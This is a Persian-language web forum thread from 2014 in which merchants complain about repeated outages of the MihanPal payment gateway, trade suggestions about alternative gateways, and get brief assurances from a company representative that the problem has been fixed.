April 29th, 2014, 09:58
باز سایت میهن پل خراب شد :((
اینبار 10 دقیقه بیشتر قطع نشد خوشبختانه :)
siingle_boy
April 30th, 2014, 23:09
آقا امروز فک کنم میهن پال بازم مشکل داشت الانم وصل نمیشه به بانک
Ndanda
May 2nd, 2014, 22:34
سلامم اقا باز قطع هم سایت هم درگاه چرا اخه :((
serok
May 2nd, 2014, 22:39
سلام چرا ارور Error in request میده!!
همه چیزا هم درسته
siingle_boy
May 2nd, 2014, 23:09
بازم مشکل فک کنم از ساعت 7-8 خراب شده تا الان
felfel
May 3rd, 2014, 12:09
احتمالا اطلاعاتشون رو پلیس فتا استعلام کرده اند.
یعنی فتا به سایت شما دسترسی دارد!؟
چون شما گفته بودید که اطلاعات داده نشده به کسی و کسی هم استعلام نکرده .
siingle_boy
May 3rd, 2014, 16:18
مشکل میهن پال حل شده ؟ یا هنو مشکل داره ؟
aminzadeh
May 3rd, 2014, 21:07
از هاست های ایرانی وصل می شه ولی از هاست خارجی وصل نمی شه
pabi
May 3rd, 2014, 22:54
باز که میهن پال داغون شد!!!
باوو اگه قراره اینجوری باشین ، بگین تا به فکر یه درگاه دیگه باشیم
هی هر هفته قطعین که!!!!
ata3929
May 4th, 2014, 20:08
آقای میهن پال شما گفته بودین که اطلاعات تماس رو سایتتون و آدرس و میزنین ؟!پس چی شد سه ماهه هنور آدرس و اطلاعات تماس و نمیزیزنین چرا ؟
meva300
May 5th, 2014, 13:23
باز که مشکل داره ! :(
___.Hrs.___
May 5th, 2014, 14:03
مث که درست بشو نیست 1 روز کامل گذشت هنوز خرابه
Ndanda
May 5th, 2014, 14:11
سلام هنوز مشکلش رفع نشده!!!!!!!!!!!!!!!!!!!!!!!
bl4ck
May 10th, 2014, 01:59
سلام
ایشون تو بخش داشبورد کاربری نوشته بود که سرور جدید سفارش داده اند و تا روز 5 شنبه یعنی 18/2/1393 سایت اماده استفاده خواهد بود
اما حتی جمعه هم گذشت و مشکل .... :|
demonse2
May 10th, 2014, 09:38
والا بغران :62:
siingle_boy
May 10th, 2014, 13:40
خبری نشد ؟
alexa_host
May 10th, 2014, 13:58
بهترین کار اینه فعلا از درگاه دیگه ای استفاده کنید تا مشکلات میهن پال به صورت کامل حل بشه.
داشتن یک درگاه دیگه هم ضرری نداره . و درصورت مشکل هر یکی از درگاه ها شما یه درگاه پشتیبان خواهید داشت
SAJJADSAA
May 10th, 2014, 14:18
:-| خوب از درگاه های دیگه مثل زرین پالو جهان پیو :|و ... استفاده کنید
فقط
هر چیزی غیر شارژ ایران!
pensive_irani
May 11th, 2014, 00:20
:-|
خوب از درگاه های دیگه مثل زرین پالو جهان پیو :|و ... استفاده کنید
فقط
هر چیزی غیر شارژ ایران!
شارژ ایران چه مشکلی داره میتونید بیشتر توضیح بدبد؟
majid2009s
May 11th, 2014, 13:49
مشکل سایت مرتفع شده اگر کسی مشکلی داشت در سایت تیکت ایجاد کنه تا به مشکلشون رسیدگی بشه.
siingle_boy
May 11th, 2014, 14:34
مشکل الان کامل برطرف شده ؟؟؟؟؟؟؟؟
majid2009s
May 11th, 2014, 15:14
مشکل الان کامل برطرف شده ؟؟؟؟؟؟؟؟
بله.
hasan021
May 11th, 2014, 15:27
بله.
کو ؟ کجا ؟
هنوز که هنوزه مشکل داره از شب تاحالا مشکل داره و هنوز رفع نشده . ! لطفا سریعا مشکل رو رفع کنید
تقریبا 8 روزه که این مشکلات رو داره هی قطع میشه و وصل میشه و ....
لطفا سرثعا اقدام کنید . ممنون
bl4ck
May 11th, 2014, 15:32
اقا مجید ممنون بابت حل مشکلاتش
یکی از خوبی های میهن پال واریز سریع هستش بخاطر اینه من پلاگین اینو دادم برنامه نویس برام نوشت به جای مثلا زرین پال و ...
درگاه ما این پیام رو میده "خطای سیستمي
خطا در اتصال به میهن پال
"
majid2009s
May 12th, 2014, 09:47
دوستان عرض کردم خدمتتون اگز مشکلی دارید از طریق تیکت پیگیری کنید تا سریع تر به مشکلتون رسیدگی شود.
ata3929
May 12th, 2014, 09:51
آقا چرا آدرس دقیق و شماره تلفن شرکت و رو سایت نمیزنین ؟
siingle_boy
May 12th, 2014, 13:32
آقا فک کنم هنوزم مشکل داشته باشه آخه با آیپی خارجی سایتتون بالا نمیاد
saymon
May 13th, 2014, 23:24
لطفا اعلام کنید که مشکل به طور کلی رفع شده یا نه هنوز در حال تست هست؟
majid2009s
May 14th, 2014, 00:08
لطفا اعلام کنید که مشکل به طور کلی رفع شده یا نه هنوز در حال تست هست؟
مشکل رفع شده است.
Lexus
May 14th, 2014, 19:38
بنظرم بهترین درگاه آنلاین هست که دیدم و کار کردم. همه چیش عالیه
sat2they
May 17th, 2014, 13:23
دوباره درگاه خراب شده !!!!!
Ndanda
May 17th, 2014, 14:04
سلام اری خراب شد من که دیگه خسته شدم ادم که 24 ساعت نمیتونه بشینه پای نت ببینه کی درگاه درسته فعال کنه کی خرابه خیرفعال کنه والا خسته شدیم چرا کامل درستش نمیکنید
سایت الان کلا بالا نمیاد
meva300
May 18th, 2014, 00:04
این قطعی تا کی ادامه داره خدا میدونه
:(
pensive_irani
May 18th, 2014, 00:12
سلام
با تمام احترامی که برای میهن پال قائل هستم اما ظاهرا توانایی حل مسئله را ندارند حتما باید دوستانی که در زمینه امنیت سایت ها فعالیت دارند به ایشان کمک کنند تا مشکل برطرف گردد امیدوارم آقای صدرالدینی از افراد زبده این کار کمک بگیرد..........
doke_palang
May 18th, 2014, 12:52
با سلام
اگه یکی پیدا میشد جواب میداد خیلی خوب بود والا قبلن یک چیزی بود به عنوان مشتری مداری طرف مشکل هم داشت باز هم جواب میداد والا 1ماه همه جوره با این مشکلات ساختیم ما یوزر فکر کنم حداقل انتظار ما اینه که یک جواب درست حسابی بشنویم
با تشکر
Cyrus.The.Great
May 18th, 2014, 13:08
سلام. بهتره در این مورد یک توضیحی بدید. مشکل کار کجاست؟ لطفا شفاف توضیح دهید.